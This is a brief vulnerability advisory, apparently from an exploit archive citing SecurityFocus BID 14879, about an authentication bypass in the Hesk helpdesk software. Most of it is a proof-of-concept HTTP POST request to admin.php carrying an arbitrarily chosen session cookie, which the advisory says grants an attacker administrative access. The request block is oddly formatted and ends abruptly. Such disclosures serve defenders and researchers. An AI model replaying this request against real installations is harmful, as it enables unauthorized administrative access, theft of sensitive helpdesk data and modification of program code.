source: https://www.securityfocus.com/bid/14879/info Hesk is prone to an authentication bypass vulnerability. Successful exploitation will grant an attacker administrative access to the application. This can lead to unauthorized access of sensitive data, modification of helpdesk data and program code, and other types of attacks. 1. HTTP POST request with randomly chosen Session ID:
POST admin.php +
("Host: www.example.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.example.com/hesk/admin.php
Cookie: PHPSESSID=12345
